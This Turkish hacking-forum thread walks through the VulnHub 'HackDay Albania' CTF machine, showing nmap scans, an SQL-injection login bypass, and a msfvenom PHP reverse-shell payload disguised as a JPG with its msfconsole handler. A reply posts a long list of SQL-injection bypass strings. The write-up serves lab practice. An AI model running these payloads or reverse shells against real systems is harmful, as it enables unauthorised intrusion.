Pentest Challange: Albian

Belvando

Üye
3 Haz 2017
249
15
Mantı V2

Arkadaşlar merhaba

Uzun bir zaman boyunca konu olarak CTF challange paylaşmadım.
Bugünde bunun anısına herhangi bir şey yapmıcam sadece Albania adındaki CTF challangeın çözümünü anlatacağım.


Dosyamızı şuradan rahatlıkla indirebilirsiniz.
https://download.vulnhub.com/hackday/HackDay-Albania.ova
Eğer indiremezseniz buradan asıl kısıma ulaşabilirsiniz.
https://www.vulnhub.com/entry/hackday-albania,167/

Önceden genel olarak 32 bit challangelar çözmekteydim.
Yeni bir bilgisayar alınca artık 64 bit challangelarda çözülebilir bir şekilde anlatıma devam edeceğim.


Ozaman başlayalım

İlk komutumuz bağlı olduğumuz ağın gatewayini öğrenmek için giriyoruz
route



Evet ip adresinin temelini 192.168.56.0 olarak alacağız.
Tüm subneti taramamız için 24 subnetini kullanacağız.
nmap -sP 192.168.56.0/24



Taramamızın sonucu olarak bize iki adet ip adresi çıkartmakta, biz 192.168.56.101 adresine saldıracağız.

Böyle bir karmaşanın olmasının nedeni önceden ağ yapısını köprü-bağdaştırıcısı ile kullanırken artık sadece-ana-makina ayarını kullanmamdan kaynaklı.
Böylece kendi gizliliğim daha ön planda olup, yapılan işlemler daha zararsız olabilmekte.

Hedef cihaza bir port taraması yapacağız, bunun için
nmap 192.168.56.101



Bize ssh(22) ve http(8008) portunun açık olduğunu söylüyor.
Tabiki http portuna bağlanmak için bir koşu tarayıcımı açıyorum.

Şunuda belirtmekte fayda var, normal bir şekilde ip adresini girerseniz default olarak 80 portunu varsayarak 80 portuna erişim isteyecektir. Bunun önüne geçmek için :8008 göstergesinide ekleyip doğru sonuca varacağız.



İlk olarak karşımıza hangi dilde olduğunu bilmediğim bir yazı ile karşılıyor ve hiç önemsemeden kapatıp bu ss'i çekiyorum.

Bir MR.Robot hayranı herhalde :D

İlk olarak dirb ile bir tarama yapıyorum ama yararımıza olacak bir veri çıkarmadığından devam ediyorum.
Sonra googlede gösterilmesi istenmeyen dizinlerin bulunduğu robot.txt dosyasına bakıyorum.




Anlaşılan bizi uğraştırmak istiyorlar, ve bende hamallık yapıp hepsini teker teker deniyorum.
Ve tek bir tanesi hariç hepsinde aynı sonucu alıyorum.



Burada vulnbank buradamı diye bir soru yöneltiyor.
(Gariptirki az önce garip bir dilde konuşan CTFimiz ingilizceyi sökmüş)
İlk olarak vulnbank urlsini ip adresini yanına yazdığımda sonuç alamazken, sadece son kısıma eklemenin yeterli olucağını anladım.
Ve güzel bir görüntü.



Karşımızda login paneli var, ve bir açık kaynayan bir sistemde olduğumdan ilk bypass deniyorum.(OR 1=1 -- -)
Başarılı bir şekilde bize istenilen sonucu veriyor.



Evet bunun gibi bir hata aldığınızda size bir meslek sırrı olan disable işlemini anlatmak istiyorum.
\ girerek mysql veritabanında kısadevre yapabilirsiniz.
Ve şifre kısmınada bypassımı yerleştiriyorum.



Girdiğimiz gibi karşımıza bir upload kısmı geliyor.
(Şimdi ilk halini göstermek isterdim ama ben bu CTFleri çözdükten sonra sizlere gösteriyorum ve elimde temiz bir çıktı olmadığından devam edebiliriz.)

Upload sistemine ilk olarak c99 shellini koymayı denedim
(Emin olun benimde bunu neden yaptığım hakkında bir fikrim yok).

Ama phpleri kabul etmesede açılmayacak şekilde anamenüye koyuyordu.
Ozamanda shellimizin uzantısını jpg ile değiştirelim.
Ve yine olmadı :D


Peki yükleyeceğimiz php dosyası illa bir shell olmak zorundamı, tabikide değil ozaman msfvenomdan php RAT oluşturuyorum.
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 R > /home/belvando/at.jpg



RATımızı oluşturduktan sonra direk olarak yeniden upload ediyoruz.
Tabiki açmadan önce bir handler çalıştırmamız gerekmekte.
msfconsole -x "use multi/handler; set payload php/meterpreter/reverse_tcp; set lhost 192.168.56.1; exploit"

Hazırladığımız RATı upload ediyoruz.



Handlerımız çalışmakta iken bende karşı tarafa upload ettiğim RATımı açıyorum ve hemen bağlantı handlera düşüyor.



Evet bu seferkine kolay bir şekilde sızdık.

Eğer bunun gibi challangeların paylaşımını istiyorsanız teşekkür etmeyi unutmayın.
Elimde bir sürü challange var.
Eğer bir hatam olursa afola.
Birseferki konuda görüşmek dileğiyle.


:RpS_thumbsup:HEPİNİZ USTA BİR HACKERSINIZ, TABİ ÖĞRENMEK İSTERSENİZ.:RpS_thumbsup:
 

0x762

Yaşayan Forum Efsanesi
4 Nis 2016
38,343
35
eline sağlık güzel çalışma olmuş :)
 
Moderatör tarafında düzenlendi:

KurokoTetsuya

Kadim Üye
23 Nis 2015
5,028
2
SGA
Böyle konuları okumak yerine BruteForce'u tercih ediyorsanız kendinize "Ben hack yolunda ilerliyorum" diyemezsiniz.

Elinize sağlık, dün mesaj atacaktım daha konularınızı göremiyorum diye.
 

akrandd

Üye
25 Eyl 2013
183
0
Forumda neredeyse ilk defa, bruteforce yapıp ben hackerım diye geçinmeyen biriyle karşılaşıyoru. Bypass kodlarını konuya eklermisiniz?
 

Belvando

Üye
3 Haz 2017
249
15
Mantı V2
Böyle konuları okumak yerine BruteForce'u tercih ediyorsanız kendinize "Ben hack yolunda ilerliyorum" diyemezsiniz.

Elinize sağlık, dün mesaj atacaktım daha konularınızı göremiyorum diye.

Evet bu aralar tatilde olduğumdan fazla ilgilenemiyorum.

Forumda neredeyse ilk defa, bruteforce yapıp ben hackerım diye geçinmeyen biriyle karşılaşıyoru. Bypass kodlarını konuya eklermisiniz?

Kod:
 ' or ''='
‘or’1’=’1
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
OR 1=1 -- -
' or true--
') or true--
') or ('')=('
') or 1--
') or ('x')=('
" or true--
" or ""="
" or 1--
" or "x"="
") or true--
") or ("")=("
") or 1--
") or ("x")=("
')) or true--
')) or ((''))=(('
')) or 1--
')) or (('x'))=(('
'-'
'+'
'&'
'^'
'*'
' or ''-'
' or ''+'
' or ''&'
' or ''^'
' or ''*'
"-"
"+"
"&"
"^"
"*"
" or ""-"
" or ""+"
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
 

kondanta

Katılımcı Üye
29 Tem 2017
910
0
CNCF
Şuan baya şaşırdığımı itiraf etmem gerek. Yukarıda da belirtildiği gibi, ilk defa "bruteforcecu hacker" görüyorum. Konuya abone olma gereği hissettim, ilgimi çekti. Eline emeğine sağlık.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.